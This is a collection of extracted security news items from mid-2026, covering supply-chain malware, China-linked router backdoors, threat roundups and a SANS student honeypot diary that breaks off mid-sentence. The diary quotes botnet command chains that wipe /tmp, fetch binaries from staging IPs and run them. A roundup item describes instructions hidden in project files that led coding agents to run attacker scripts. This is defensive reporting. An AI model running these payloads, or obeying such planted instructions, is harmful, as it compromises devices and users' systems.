setup using a smartphone placed near the target device, significantly outperforming prior unsupervised baselines in low-data regimes." Two Open-Source Software Supply Chain Attack Campaigns - Socket has flagged a fake corepack.org site that's impersonating Corepack, a Node.js tool for managing package managers, and using it as a lure to deliver an infostealer and proxyware to developers who download it. "The site has existed in some form since early 2026 as a low-quality, apparently AI-generated imitation, but it recently started serving executable downloads," Socket said. "Corepack is not distributed as a Windows installer, and the real project has no official website at corepack.org. Any download offered there should be treated as malicious." It's assessed that the site is AI-generated. In a related development, JFrog identified a massive set of 148 npm packages that are disguised as student web proxies, but hide mutable remote code execution vectors and a high-performance Wisp-compatible WebSocket traffic generator. "They were designed to silently enlist visiting browsers into distributed denial-of-service botnets while generating aggressive popunder advertising revenue," it said. Some aspects of the campaign were highlighted by SafeDep in late May 2026. AI linked to more than half of cybercrime in Africa - A new report from INTERPOL has found that AI is enabling 55% of reported cybercrimes across Africa, making attacks faster, more scalable, and increasingly difficult for victims and platforms to detect. This encompasses digital sextortion and online harassment, as well as sophisticated business email compromise (BEC) schemes. "The absence of real-time, inter-agency data sharing between banks, telecoms and law enforcement creates a dangerous blind spot in efforts to combat financial fraud," INTERPOL said. "This vulnerability is being exploited by criminals who have moved beyond simply stealing existing credentials to creating entirely synthetic identities. Combining real personal data with fabricated elements, these AI-generated digital personas can bypass even advanced biometric verification systems and have been used to open bank accounts, secure mobile loans and register SIM cards under false names." Security Risks of Exposed MCP Servers - Google-owned Wiz has warned that enterprises are exposing Model Context Protocol (MCP) servers to the internet, with some of them returning full tool catalog to an anonymous caller, fetching real data, and revealing a sensitive backend. "These expose sensitive data like employee PII and internal business records, write and delete operations on production systems, and in some cases code execution and access to cloud credentials," Wiz said. "The protocol's first widely-used version shipped without an authentication mechanism. The spec added OAuth 2.1 in March 2025, but nearly all the servers we found still run the original version and don't use it. The pattern is the same across most of them: backend credentials baked into the deployment, a managed cloud endpoint that's internet-reachable by default, no auth layer added on top." Nuclear-Sabotage Malware Benchmark Trick Most Frontier AI Models - A multi-stage reverse-engineering benchmark developed by SentinelOne tests "whether a model can keep a malware investigation trustworthy as new evidence repeatedly invalidates its earlier conclusions," in contrast to other AI benchmarks that test bounded tasks. Developed based on its own analysis of the Fast16 malware, the study found that "OpenAI's GPT-5.6 Sol was the only publicly available model to complete the full eight-stage investigation, giving concrete shape to what 'Frontier-class' capabilities offer analysts." That said, humans remain essential to define objectives, expose blind spots, and retain final publication authority. An Open Directory Reveals NGINX Rift and Ghost CMS Exploits - An exposed directory on a Singapore-hosted VPS, 165.154.236[.]93, has been found to stage exploits for NGINX Rift (CVE-2026-42945), a long-standing heap overflow, and a blind SQL injection in the Ghost Content API (CVE-2026-26980), alongside Splunk, PaperCut, Samba, WebLogic, and D-Link NAS tooling. "The recovered shell history from the directory recorded the attacker running the exploits against live external infrastructure, using out-of-band (OOB) DNS callbacks to verify execution, and using the same server to catch reverse shells," Hunt.io said. "Alongside the web exploits were a broader RCE toolkit and pre-staged install files for AdaptixC2 and SuperShell. The target list spanned eleven countries across five continents and leaned heavily toward high-value sectors: federal and state government, universities, healthcare and financial services." The activity is believed to be the work of a Chinese-speaking threat actor. CISA Issues Guidance to Isolate Vital Systems and Manage OSS Risks - The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued guidance to help critical infrastructure operators protect essential services from growing cyber threats and ensure continuity of operations during cyber incidents or geopolitical crises by maintaining robust isolation and recovery plans. "State-sponsored cyber actors target critical infrastructure for several nefarious reasons such as espionage or service disruption, often linked to broader geopolitical conflicts," CISA said. "During crises or conflicts, operators of critical infrastructure and network defenders may isolate essential operational technology (OT) systems as an emergency measure to prevent adversaries from executing cyberattacks, to contain ongoing threats, and to facilitate the restoration of compromised systems." The agency has also outlined considerations and best practices for federal entities to securely use, evaluate, and publish open-source software. "The guidance urges agencies to obtain sufficient transparency into all relevant components, including training data, of the AI system before deeming the product as OSS for risk management purposes," it said. "Only with transparency and access can agencies understand and study the software, analyze it for vulnerabilities, and remediate any found vulnerabilities or risks." RubyGems Cryptojacking Campaign - A set of 199 malicious gems published to RubyGems has been found to embed an identical XMRig cryptojacking payload to mine Monero cryptocurrency on developer systems. "Each gem is a trojanized copy of a popular, legitimate Ruby library," Palo Alto Networks Unit 42 said. "The payload uses a 5-hour delayed Thread.new{sleep 18000; ...} trigger to evade sandbox analysis." In addition to taking steps to achieve persistence via multiple methods, the malware uses SSH for lateral movement and is capable of infecting other ecosystems, including Node.js, Python, Docker, Git, and VS Code extensions. Mend.io, which also shared details of the campaign, said the payload is hidden inside a dotfile (lib/.threadpool.rb) that standard directory scans skip by default. Email Threat Landscape in Q2 2026 - Microsoft said phishing volume linked to the Tycoon 2FA phishing platform, including QR code phishing and CAPTCHA-gated phishing, fell 92% from pre-disruption averages in the second quarter of 2026 between April and June. However, the tech giant said it "observed continued growth in Teams-based social engineering, particularly voice phishing (vishing), with weekly malicious call attempts reaching nearly ten times the mid-2025 baseline by the end of the quarter." Microsoft said it detected approximately 7.6 billion email-based phishing threats throughout the quarter, with monthly volumes declining modestly from 2.7 billion in April to 2.4 billion in June. HTML and PDF attachments remained the two most common malicious payload types across the quarter, together accounting for roughly 60-70% of all payload-based attacks each month. In early June 2026, Microsoft said it detected a large-scale BEC campaign that reached more than 67,000 users across more than 42,000 organizations in under three hours, most of them in the U.S., with an aim to redirect salary payments to attacker-controlled bank accounts. 🔧 Cybersecurity Tools EMBA → Firmware is where critical bugs hide longest because it is opaque, fragmented, and painful to inspect manually. EMBA turns that black box into an actionable security report: it extracts embedded-device firmware, runs static and emulation-based analysis, builds an SBOM, and flags outdated components, insecure binaries, vulnerable scripts, and hard-coded credentials through a command-line workflow with web-based reporting. Built for penetration testers, product-security teams, and developers, it compresses days of firmware triage into a repeatable open-source process. GrantGuard → Every "always allow" click in Claude Code can leave behind a standing permission that remains long after the task ends, with pasted API keys, credential-store access, unrestricted git push, or destructive commands buried in rarely reviewed settings. GrantGuard is an open-source, local-only tool that finds these accumulated grants, classifies them by risk, and lets users remove unsafe permissions through a browser interface or CLI, without sending settings off-device or loading third-party runtime packages. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you're doing stays on the right side of the law. Conclusion The useful question is not whether a system is exposed. It is which quiet assumption lets it reach farther than intended: a default, a trusted workflow, an abandoned endpoint, or code nobody checked. That is where the next incident is probably waiting. Not in the loudest alert, but in the handoff everyone assumes belongs to someone else. Check the boundaries. Then check what crosses them.
thehackernews.comAug 3, 2026extracted
These near-mint ASUS Chromebook refurbs are only $145
Buying a new computer in 2026 is a unique experience. Rather than deal with incredibly high tech prices, more shoppers are opting for high-quality refurbished tech. This ASUS Chromebook CM30 refurb is in near-mint condition with a grade “A” rating, but it still only costs $144.97 (reg. $369.99) on sale. A tablet and a laptop for under $200 This is a Grade “A” refurbished Chromebook, so it arrives in near-mint shape with minimal to no scuffing on the case. The screen is a 10.5-inch WUXGA touchscreen at 1920×1200, and it hits 400 nits with 118% sRGB coverage, so text stays sharp, and colors hold up in a bright room. Inside, there’s a MediaTek Kompanio 520 with 8GB of RAM. Storage is a 128GB eMMC drive. That combination handles Chrome OS, a stack of browser tabs, and streaming without stalling. It’s a great machine for lightweight tasks and portability, but that’s not all it can do. The detachable keyboard and magnetic stand cover let you drop the screen off and use it as a tablet in seconds. A push-pop stylus charges fast and stores right in the body, so you’re not hunting for it or leaving it behind on accident. Dual 5MP cameras cover video calls and quick captures. The chassis is military-grade aluminum made with 30% recycled material, and it meets MIL-STD 810H durability standards. Battery life runs up to 12 hours, so a full workday or a long flight won’t leave you chasing an outlet. Wi-Fi 6 and Bluetooth 5.3 keep connections quick, and you get a USB-C port plus a headphone jack. A 90-day parts and labor warranty from a third party is included. Get a 2-in-1 computer that works on the couch and at the desk without paying new-hardware prices. Until August 9 at 11:59 p.m. PT, get a grade “A” refurbished ASUS Chromebook CM30 on sale for $144.97. Prices subject to change. Disclosure: This is a StackCommerce deal in partnership with BleepingComputer.com. In order to participate in this deal or giveaway you are required to register an account in our StackCommerce store. To learn more about how StackCommerce handles your registration information please see the StackCommerce Privacy Policy. Furthermore, BleepingComputer.com earns a commission for every sale made through StackCommerce. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJul 29, 2026extracted
13th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th July, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES U.S. auto insurer AssuranceAmerica has disclosed a data breach affecting approximately 7 million people. Attackers targeted an employee and used compromised credentials to access company systems, stealing names, contact information, driver’s license numbers, insurance policy and account data, vehicle information, and claims details. Latvia’s state-owned forestry company Latvijas Valsts Meži has suffered a ransomware attack that disrupted mapping, hunting, contractor, and customer systems. Attackers exploited a system that had remained unpatched for two years and leaked approximately 44GB of internal documents, credentials, cryptographic keys, source code, and email correspondence. Injective Labs, a developer of blockchain and cryptocurrency software, has experienced a supply chain compromise after attackers accessed its SDK project and published malicious npm packages. The affected releases exfiltrated cryptocurrency wallet private keys and seed phrases when developers used legitimate key-generation functions embedded in the compromised software. Moody Bible Institute, a U.S. faith-based educational institution, has disclosed a data breach affecting more than 2.3 million donors, students, alumni, and supporters. The ShinyHunters extortion group published allegedly stolen information, including names, dates of birth, residential addresses, email addresses, and phone numbers. AI THREATS Researchers profiled JadePuffer, an autonomous ransomware operation that used a large language model to conduct an intrusion without direct human control. The operation exploited CVE-2025-3248 in an exposed Langflow instance, accessed a production MySQL server, exfiltrated selected information, deleted the database, and issued an extortion demand. Researchers showed that malicious instructions hidden inside open-source project files could achieve remote code execution through Anthropic Claude Code and OpenAI Codex. When operating with automated permissions, the coding agents processed the instructions and executed attacker-controlled scripts, demonstrating a risk that may affect other autonomous development tools. Researchers disclosed Rogue Agent, a vulnerability in Google Dialogflow CX that allowed users with limited agent-editing permission to insert persistent malicious code. The injected code could capture and exfiltrate chatbot conversations. Google addressed the issue, and no known customer environments were compromised through the vulnerability. VULNERABILITIES AND PATCHES Multiple Tenda router models are affected by CVE-2026-11405, an undocumented authentication backdoor that provides administrative access through a hidden password. The flaw affects several FH1201, W15E, AC10, AC5, and AC6 firmware versions and allows attackers to bypass configured credentials and modify device and network settings. Linux maintainers have patched CVE-2026-53359, a critical vulnerability in the Kernel-based Virtual Machine hypervisor. A malicious guest virtual machine could corrupt host kernel memory and potentially escape into the host environment. The flaw affects Intel and AMD x86 systems and is particularly relevant to shared cloud infrastructure. U-Boot has addressed six vulnerabilities affecting signature verification of Flattened Image Tree files used during secure boot. Two flaws could enable arbitrary code execution while a device loads a supposedly verified image, and four could cause crashes. The affected bootloader is widely used in routers, cameras, and embedded controllers. Opera has addressed a critical vulnerability in the Opera GX browser that allowed malicious websites to install browser modifications without user confirmation. An attacker-controlled modification could inject styles across open tabs, leak information such as Gmail addresses, and crash the browser. Opera corrected the issue. THREAT INTELLIGENCE REPORTS Check Point Research has profiled Cavern Manticore, an Iran-linked threat actor targeting Israeli government and information technology organizations. The group uses a modular .NET command-and-control framework and has abused remote management software and a compromised software update mechanism to deploy file-management, database, scanning, and tunneling capabilities. Check Point Threat Emulation and Harmony Endpoint provide protection against this threat Check Point Research have analyzed global cyberattack activity during June 2026, recording an average of 2,270 weekly attacks per organization. Ransomware incidents increased by 33% from June 2025, while The Gentlemen overtook Qilin as the most active group during the month. Check Point researchers have investigated a student employment phishing campaign that abused compromised school email accounts and Google Forms. More than 3,200 messages passed email authentication checks and attempted to collect banking information, residential addresses, and other details associated with money mule recruitment and account compromise. Researchers analyzed UAT-7810, a China-linked threat actor that compromises internet-facing networking devices to expand operational relay box infrastructure. The group developed new malware components and exploited unpatched Ruckus and ASUS devices to create proxy nodes for associated threat actors.
research.checkpoint.comJul 13, 2026extracted
China-Linked APT Expands Arsenal With New ‘Leash’ Backdoors
A China-linked advanced persistent threat (APT) actor building an operational relay box (ORB) network for espionage has been updating its arsenal with new backdoors, Cisco’s Talos researchers warn. As part of a prolonged espionage infrastructure campaign tracked as LapDogs, the APT infected over 1,000 small office/home office (SOHO) routers with the ShortLeash backdoor, SecurityScorecard reported last year. Talos, which tracks the threat actor as UAT-7810, has discovered a newer version of the backdoor, dubbed LongLeash, as well as two other malware families the APT has been relying on, namely DogLeash and JarLeash. UAT-7810 mainly targets known vulnerabilities in Ruckus wireless routers, including CVE-2020-22653, CVE-2020-22658, and CVE-2023-25717, and was seen using payloads for multiple architectures, including MIPS, ARM, and x64. Talos identified three IP addresses associated with VPS instances that UAT-7810 uses to download payloads, as well as four new servers the APT has been using to host malicious payloads such as DogLeash and accompanying shell scripts. One of the IPs was also used in attacks targeting Asus AiCloud Routers, likely as part of the apparent ORB facilitation campaign dubbed Operation WrtHug that was publicly detailed in November 2025. UAT-7810, Talos says, provides infrastructure to another China-linked APT, namely UAT-5918. The groups’ tooling overlaps, but they are still tracked as separate groups. The recently identified LongLeash backdoor builds on the functionality previously observed in ShortLeash, such as command-and-control (C&C) communication, web server hosting, tunnel management, and the ability to act both as C&C and client, as well as additional capabilities. It was built largely on the same codebase, but also contains code from the Nanopb and MbedTLS open source libraries. The backdoor can function as an intermediate server, forwarding commands and data received from the C&C to other peers. DogLeash is a C-based passive backdoor deployed via a shell script that also adds iptables rules allowing TCP traffic to a port that DogLeash binds and listens to. Based on code received from the C&C, the backdoor can execute commands, read files, rename files, close the socket listener, retrieve OS information, and execute code in memory. JarLeash is a Java-based backdoor that provides UAT-7810 with easy access to compromised systems. It is used alongside a script that kills all other instances of the backdoor and then spawns the Java container to deploy the malware. The backdoor can also be deployed on the APT’s internal infrastructure. The backdoor can host a web-based file management interface and FTP and SFTP servers, and can run a netcat server on a provided IP and port number. UAT-7810 was also seen developing LeashTest, a binary that tests functionality on the MIPS platform, and which is not malicious on its own, but can be an indicator of compromise (IoC). “The development and use of LeashTest signifies that even though they have developed LongLeash, a full-fledged backdoor framework, UAT-7810 is still actively testing functionality on MIPS platforms and may not be completely confident of its behavior on MIPS devices,” Talos notes. Related: Chinese Framework Powers 200,000 Scam Sites Related: Chinese Hackers Target Medical, Military, and AI Research in North America
securityweek.comJul 8, 2026extracted
China-Linked APT Expands Proxy Network With New Malware
A China-linked hacking group has been observed expanding a network of hijacked devices used to disguise cyber-attacks, arming it with several newly discovered pieces of custom malware, researchers have found. Cisco Talos said the actor, an advanced persistent threat (APT) group it tracks as UAT-7810, built what are known as Operational Relay Box (ORB) networks, meshes of compromised routers and other devices that other hackers rent to route their traffic through and hide their origin. Talos assessed with high confidence that UAT-7810 is a China-nexus group. A Relay Network for Other Hackers The company said UAT-7810 maintained a long-running ORB network known as LapDogs, first exposed in 2025, and that its role was essentially to build infrastructure for others. Once it had quietly taken over enough devices, separate China-nexus APT groups could use that relay network to mask their own espionage against high-value targets. To grow the network, the group broke into edge devices using known but unpatched vulnerabilities, a low-effort tactic that relies on organizations failing to apply fixes. The researchers said it had targeted flaws in Ruckus wireless routers since 2025 and, earlier this year, began exploiting a bug in ASUS routers to fold them into the network too. A Growing Malware Toolkit Talos said UAT-7810 is developing an upgraded backdoor called LONGLEASH, an evolution of an earlier tool that adds proxying features and can even relay commands to other infected machines. It also uncovered two previously unknown backdoors: DOGLEASH, which ran commands on compromised Linux devices and a Java-based tool, JARLEASH, used to manage the group's servers. A configuration file for JARLEASH contained comments in Simplified Chinese, which Talos said indicated Chinese-speaking operators. The firm also found a test program aimed at MIPS-based devices, a sign the group was still refining its tools for the varied hardware that made up its network. The findings come from Talos's own tracking of the group's malware and servers, which it said remain active.
infosecurity-magazine.comJul 8, 2026extracted
China-Linked UAT-7810 Expands ORB Network With New LONGLEASH Malware
A Chinese threat actor tracked as UAT-7810 is actively refining its bespoke malware to expand its Operational Relay Box (ORB) network by breaking into internet-facing networking devices. According to findings from Cisco Talos, UAT-7810 is an advanced persistent threat (APT) actor that's responsible for maintaining and proliferating LapDogs, an ORB network that first came to light in June 2025. "UAT-7810 is most likely tasked with establishing Operational Relay Box (ORB) networks that can then be leveraged by associated secondary threat actors to conduct their own malicious attacks against high value targets," researchers Jungsoo An, Asheer Malhotra, Vanja Svajcer, and Brandon White said. One such China-nexus threat actor that has leveraged the infrastructure in its own attacks is UAT-5918, which has been linked to cyber attacks targeting critical infrastructure entities in Taiwan since at least 2023 with an aim to establish persistent access within victim environments. The latest findings indicate that UAT-7810 has continued to develop their custom malware dubbed ShortLeash with a newer version that's codenamed LONGLEASH. Also put to use by the threat actor are two other previously unreported tools - DOGLEASH, a passive backdoor that can execute arbitrary shellcode on a compromised Linux device LEASHTEST, an ELF binary that's used for testing certain functionality, like creating a thread, a child process, or an async timer, on MIPS-based embedded devices "UAT-7810 used at least four new servers to host a variety of minor variations of DOGLEASH to deploy against compromised targets," the researchers added. "An additional Java-based (JAR package) backdoor that we track as 'JARLEASH' was also deployed by UAT-7810 on at least one of the three servers for administration purposes, including file management, FTP, SFTP, and Netcat." Attack chains mounted by the hacking crew are known to weaponize known vulnerabilities in unpatched Ruckus wireless routers, such as CVE-2020-22653, CVE-2020-22658, and CVE-2023-25717. Campaigns observed earlier this year have also singled out ASUS AiCloud Routers susceptible to CVE-2025-2492, indicating potential attempts to broaden the ORB network. ShortLeash incorporates a backdoor capable of contacting an external server, hosting a web server, and acting as both a command-and-control (C2) server and client. Its successor, LONGLEASH, packs in additional functionality, pointing to an active development cycle. Some of the newer features are listed below - An executor component that enables proxying functions using HTTP, DNS, SOCKS, TCP, ICMP, and UDP protocols, manages network connections to other servers, authorizes clients, and removes the implant and all traces from the server if any tampering attempts are detected Act as an intermediate C2 server to relay commands and data from the primary C2 and forward it to its peers "The development and use of LEASHTEST signifies that even though they have developed LONGLEASH, a full-fledged backdoor framework, UAT-7810 is still actively testing functionality on MIPS platforms and may not be completely confident of its behavior on MIPS devices," Talos said.
thehackernews.comJul 8, 2026extracted
Chinese hackers develop LONGLEASH malware to expand ORB network
Chinese hackers tracked as 'UAT-7810' are actively evolving their malware to expand their Operational Relay Box (ORB) network by compromising internet-facing networking devices, primarily unpatched Ruckus routers. According to Cisco Talos researchers, the ORB network serves as a secure relay infrastructure for other China-aligned advanced persistent threats (APTs), including UAT-5918. This type of infrastructure, which was previously documented by Google Mandiant, allows threat actors to proxy their network traffic through regional devices, making it appear to originate from legitimate local infrastructure to evade detection and complicate attribution. The Talos analysts have identified new malware in the campaign, including LONGLEASH, a new version of the previously documented SHORTLEASH backdoor, DOGLEASH, a Linux backdoor, JARLEASH, an administrative tool, and LEASHTEST, a testing utility. The researchers report that UAT-7810 primarily exploits known (n-day) vulnerabilities to gain initial access, including CVE-2020-22653, CVE-2020-22658, and CVE-2023-25717 in Ruckus routers, as well as CVE-2025-2492 in ASUS AiCloud routers. LONGLEASH malware The newly discovered LONGLEASH malware is an upgraded version of SHORTLEASH, first documented by SecurityScorecard in 2025, that significantly expands its capabilities. The malware builds on the previous version, which supported command-and-control (C2) communications, web server hosting, network tunnel management, and operation as both a C2 server and client. In addition to those, Talos researchers have now also observed the following capabilities: Reverse shell HTTP, DNS, SOCKS, TCP, ICMP, and UDP proxying with traffic redirection SMTP client/server functionality TLS and PKI support Self-removal for when tampering or other suspicious activity is detected Ability to act as an intermediate C2 server, forwarding commands and data between infected nodes DOGLEASH, JARLEASH, and LEASHTEST Apart from LONGLEASH, the researchers have also discovered DOGLEASH, a lightweight Linux backdoor deployed via web shell scripts. Upon launch, it opens a listening TCP port and authenticates incoming requests using a hardcoded password, supporting shell command execution, file access and modification, OS information retrieval, and arbitrary code execution directly in the host's memory. JARLEASH is a Java-based administrative tool that provides web-based file management and includes FTP, SFTP, and Netcat server functionality. Finally, the threat actors have developed LEASHTEST, which can be used to verify whether an MIPS IoT device can perform functions related to malware operations, likely to help refine LONGLEASH’s MIPS support. Cisco Talos concludes that UAT-7810 continues to expand its ORB infrastructure, actively replacing or extending SHORTLEASH with the more capable LONGLEASH while broadening its toolkit with new malware. A complete list of the indicators of compromise (IoCs) linked to UAT-7810 activity and the latest toolset is available at the bottom of Cisco Talos’ report. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJul 7, 2026extracted
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
by Nicole Phillips, SANS.edu BACS Student (Version: 1) [This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program] "I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen." — Eeyore, Winnie the Pooh Introduction: Listening to the Static Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That said, reviewing raw honeypot logs can feel overwhelming. Every day, public facing servers are bombarded by millions of identical hits, mostly automated, creating a fog of noise that seems repetitive, yet disconnected and chaotic. After seeing the same sequence of activity day in and day out, it becomes easy to dismiss traffic as loud background static. But like Eeyore's observation of the Hundred Acre Wood, the background noise has a lot to say if you stop to listen. Witnessing the noise helps you understand how to recognize the anomalies. When slowing down and looking more closely at patterns, the fog lifts, revealing layers of orchestration in an automated shadow economy that increasingly drives my curiosity. • What are automated botnets and scanners? • How do they operate? • What are they looking for? • What or who operates behind the scenes, and how mature are their engineering tactics? While I'm unable to fully answer these questions, I will try to deconstruct some of the malicious automated background noise at several tiers, tracing its trajectory from low-level mechanical slips and overlaps to human-mimicking deception. A note on attribution: The assessment that follows references each operation based on its observed "User-Agent" identifier to cluster specific infrastructure and automated behavior; it does not imply definitive attribution of the activity to the original botnet developers. The Commodity Layer: Surface Noise Much of the malicious noise consists of bots and automated scripts scanning blindly for vulnerable IoT devices. These are the weeds of this ecosystem, initially ignored, until one day the entire garden is overrun. In the digital space, this appears as low-level static. It's easy to assume that exploits will reveal themselves out of the static through standard telemetry. I've learned through this internship, however, that malicious activity at this layer is much simpler. Attackers are not knocking down doors; they are walking right through them. Because so much of network defense is inherently reactive, a lot of this activity simply gets missed. While the operators exhibit technical limitations and sloppy mistakes, they succeed because they are paying attention. Through automation, mass trial and error campaigns, and volume that outpaces patching and CVEs, these operators can find and weaponize simple gaps that go unnoticed. My web honeypot captured traffic that illustrates this dynamic. Terrabot: The Disposable Swarm TerraBot is an aggressive IoT botnet variant derived from Mirai and Gafgyt source code frameworks that scans the internet for exploits to weaponize and build its network of compromised devices [3]. The User-Agent string, terrabot-owned-you appears repeatedly in my logs. Between May 28 and June 9 my honeypot saw 24 hits from 24 unique IPs, all with the same User-Agent string. The vast majority – 17 of the 24 hits – targeted the /GponForm/diag_Form?images/ endpoint, while 6 hits delivered a payload targeting a known unauthenticated command injection vulnerability affecting legacy D-Link DSL gateway routers (CVE-2016-20017) using a staging server at hxxp://140[.]233.190, 47.as shown below: Figure 1: Terrabot payload attempting unauthenticated command injection against legacy D-Link DSL routers (CVE-2016-20017) Interestingly, Terrabot's automation failures begin with the first hit in my logs, a POST request to /GponForm/diag_Form?images/ attempting to exploit an authentication bypass flaw (CVE-2018-10561) in Dasan GPON routers. While the logs show the correctly formatted URL string, the exploit requires the POST action to actively inject the malicious payload into the router's ping diagnostic tool via the request body. My logs show each of these hits as entirely empty. This botnet was not performing reconnaissance; it was shooting blanks. Activity against these two endpoints continued over the next 11 days, always from unique IPs. Terrabot's campaign ends with a stand-alone event that further confirms its brokenness. On June 9, the following request hit from source IP: 176.116.165.207: The payload above targets a well-known unauthenticated remote code execution (RCE) backdoor found in legacy MVPower CCTV DVRs, commonly known as the JAWS Webserver RCE (CVE-2016-20016), exploited in the wild between 2017 and 2022. The "JAWS" reference relates to the embedded JAWS web-server and self-identification in HTTP response headers. Had the request been correctly formatted, the /shell endpoint would have executed in the device's root terminal as follows: • cd /tmp; rm -rf * - Eviction: the bot clears out temporary memory to aggressively wipe out competing malware strains or previous installs • wget+140.233.190.47/jaws - Staging Endpoint: the device reaches out to fetch the jaws binary, hosted on a known malicious endpoint • chmod 777 jaws; sh jaws; ./jaws - Execution: this forces max permissions and attempts to execute the payload simultaneously as both a shell script and compiled binary to ensure successful takeover. This exploit failed due to a simple formatting bug. The script author inserted an unencoded, raw space character directly after wget+ instead of standard URL encoding, causing the web server to reject the request. In HTTP protocol formatting, a single blank space acts as a delimiter separating the URI path from the HTTP Version string. Because of this unencoded space, the honeypot immediately rejected the connection with a 400 Bad Request Syntax error, highlighting sloppy, copy-pasted scripting templates that break due to simple human errors. Figure 2: Wireshark stream showing honeypot returning HTTP 400 Bad Request syntax error After a short burst of static, this event on June 9, 2026 is the last appearance of Terrabot in my logs. That said, its presence on the /login.cgi?cli=... endpoint marks the spot where it crossed paths with a more structurally sound campaign. r00ts3c: The Tactical Shift A second familiar string appears across my logs: r00ts3c-owned-you, and traces back to June 6, 2026, with the first hit from source IP 124.71.175.215. Same naming convention as Terrabot, same Mirai lineage, but a different target. This one has a detail buried in the infrastructure that complicates the "commodity" label. The activity begins on June 6 with a generic entry point: a direct request to a hardcoded debugging console backdoor shell to the hxxp://176[.]65.149.168 staging server to fetch kaizen.arm, a binary specifically targeting ARM processors. Figure 3: Initial r00ts3c entry attempting to fetch and execute the kaizen.arm binary via a debugging console backdoor The command string above is broken down as follows: • GET /shell? - Entry: The entry point debugging console • cd /tmp; rm -rf * - Mass Eviction: Like Terrabot, this wipes everything. We will see shortly why this is interesting. • wget hxxp://176[.]65.149.168/bins/kaizen.arm - Staging Endpoint: Fetches the kaizen.arm payload from a remote staging server • chmod 777 kaizen.arm; ./kaizen.arm - Execution: Sets execution permissions and runs the binary. Two days later on June 8, the activity continues with two POST requests to /UD/?9 and /UD/act?1, which are control endpoints for many consumer routers that use SOAP to communicate over HTTP [4]. Both requests contain the same staging server as the previous: On the same day, the next request hits /tmUnblock.cgi, a CGI endpoint in Linksys E-series routers carrying a critical command injection vulnerability (CVE-2025-34037). While documented since 2013 and historically exploited by "TheMoon" worm, this vulnerability continues to be actively weaponized by modern botnets [8]. Figure 4: r00ts3c targeting SOAP-based /UD router control endpoints using the primary 176.65.149.168 staging server. SANS ISC has been tracking the vulnerability since Feb 2014 [7], and this specific endpoint since September 2019. The following POST request is from source IP 119.96.223.148 out of Wuhan, China: Figure 5: r00ts3c payload targeting Linksys routers (CVE-2025-34037). Note the hardcoded 188.166.41.194 DigitalOcean IP in the HTTP Host header. Here, the injection occurs in the ttcp_ip field, which is a router diagnostic parameter expecting an IP address for TCP throughput testing. Passing -h gives it an invalid value, causing the utility to fail and triggering the shell to move to the backtick-wrapped command chain: • cd /tmp; rm -rf kaizen.mpsl - Targeted eviction: Where Terrabot's final hit ran rm -rf * and wiped everything, this removes only the kaizen binary, leaving other resident malware untouched and reducing noise on the compromised device. Note that on it's first hit, r00ts3c also wiped everything. • wget hxxp://176[.]65.149.168/bins/kaizen.mpsl - Staging Endpoint: Fetches the new kaizen.mpsl payload from a remote staging server • chmod 777 kaizen.mpsl; ./kaizen.mpsl linksys - Execution: Sets execution permissions and runs the binary with "linksys" passed as a runtime argument The .mpsl extension identifies a MIPS Little Endian compiled binary, the architecture inside Linksys E-series hardware and a payload built specifically for this target class. Despite this tactical maturity in payload management, a closer look at the raw HTTP headers reveals the same sloppy engineering. In the June 8 request from the Wuhan node shown above, the HTTP Host header reads: "Host":"188.166.41.194:80". In a properly formatted request, the Host header should reflect the IP address of the destination server (my honeypot IP). Instead, this bot is broadcasting the IP address of a completely unrelated DigitalOcean server. This hard-coding error is a recurring theme here. In other instances with r00ts3c, as well as Terrabot's JAWS attempt, the header is hardcoded as Host: 127.0.0.1:80, the loopback address used for local building and sandbox testing. The operators failed to configure these variables before releasing the bots, demonstrating hastily assembled and structurally flawed delivery systems. Wrapping up June 8, we see one final POST request, specifically targeting CVE-2016-20017, coming from source IP 20.210.107.25, with a nearly identical payload as Terrabot's D-Link campaign: Figure 6: r00ts3c D-Link exploit attempt (CVE-2016-20017) originating from Microsoft Azure cloud infrastructure. The 20.x IP belongs to Microsoft Azure. The geolocation points to an anonymous fallback for cloud infrastructure that cannot be resolved to a specific location (the literal geographic center of the United States). For the next 6 days, r00ts3c was silent, picking up again on June 14, from the same 20.210.107.25 IP, only this time targeting the /tmUnblock.cgi endpoint on port 80. Four more hits followed over the next 24 hours, repeating the /UD endpoints and pointing to the same staging server. On June 17, the bot seemed to loop back to the initial request seen on June 6, only this time from an IP out of Ukraine, pointing to a new staging server: itself, at hxxp://83.142.209.46, also fetching the kaizen.arm binary. The following day, the Azure node strikes again, essentially returning to hit the /shell backdoor one last time. This final request reverted to the original script, attempting to fetch kaizen.arm from the primary staging server at hxxp://176.65.149.168. Ultimately, this single Ukraine P2P entry demonstrates that embedded within the background noise are the structural indicators of how the automated botnets adapt, decentralize and survive. rondo (aka: RondoDox): The Deep Precursor Almost a month before r00ts3c appeared in my logs, a different operator found the perimeter. However, parsing earlier logs revealed that the rondo infrastructure had been silently active since as early as May 2. These logs reveal that the "commodity noise" may often mask highly sophisticated, enterprise-grade attacks. This campaign, tracked by the threat intelligence community as the RondoDox botnet[5], unfolded across three distinct phases in my logs. Phase 1: The Enterprise & AI Shotgun Source IP: 124.198.131.185 | C2: 45.92.1.50 The first 8 hits from this campaign originated from source IP 124.198.131.185 (Spark New Zealand). During this first phase, the operator targeted high-value enterprise and AI frameworks, utilizing a primary staging server located at hxxp://45[.]92.1.50. These initial hits highlight a more sophisticated execution chain: • Log4Shell WAF Evasion (CVE-2021-44228): The attacker utilized environment variable manipulation within the User-Agent string to successfully bypass basic Web Application Firewalls. The end of the string contains a Base64 encoded command. Decoding it 